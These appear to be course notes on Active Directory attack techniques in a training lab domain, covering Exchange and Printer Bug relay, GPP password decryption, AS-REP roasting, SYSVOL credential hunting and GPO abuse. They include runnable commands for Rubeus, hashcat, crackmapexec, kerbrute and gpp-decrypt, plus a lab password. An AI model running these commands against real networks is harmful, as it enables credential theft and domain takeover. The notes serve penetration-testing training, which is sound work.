23.Miscellaneous Misconfigurations

Key Concepts:

  • The Exchange Windows Permissions group, if misconfigured, allows for DCSync privileges.

  • The Organization Management group grants extensive control over Exchange and mailboxes.

  • Compromised Exchange servers are prime targets for credential dumping.

  • PrivExchange: Exploiting the PushSubscription feature for NTLM relay and potential domain compromise.

Printer Bug (MS-RPRN Protocol Flaw)

Key Concepts:

  • The MS-RPRN protocol flaw allows for NTLM relay via the Print Spooler service.

  • This can lead to DCSync privileges or Resource-Based Constrained Delegation (RBCD) exploitation.

  • It can be used to attack across forest trusts.

Commands:

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Forging)

Key Concepts:

  • This vulnerability allows for forging Kerberos PACs to elevate privileges.

  • Patching is the only effective defense.

Sniffing LDAP Credentials

Key Concepts:

  • Exploiting weak configurations in applications and printers that store LDAP credentials.

  • Using netcat to capture credentials.

Enumerating DNS Records (adidnsdump)

Key Concepts:

  • Using adidnsdump to discover hidden DNS records.

Commands:

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

Other Misconfigurations

Password in Description Field:

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Field:

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts:

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs

Group Policy Preferences (GPP) Passwords

Key Concepts:

  • Exploiting cpassword values in GPP XML files.

  • Using gpp-decrypt and CrackMapExec.

Commands:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
crackmapexec smb -L | grep gpp
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

AS-REP Roasting

Key Concepts:

  • Exploiting accounts with "Do not require Kerberos pre-authentication" enabled.

  • Using Rubeus, Hashcat, and Kerbrute.

Commands:

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
./Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Group Policy Object (GPO) Abuse

Key Concepts:

  • Exploiting misconfigured GPO permissions for privilege escalation and persistence.

  • Abusing GPOs to:

    • Add local admin accounts

    • Create scheduled tasks

    • Grant additional privileges to users

Previous22.Bleeding Edge VulnerabilitiesNext9.Why So Trusting

Last updated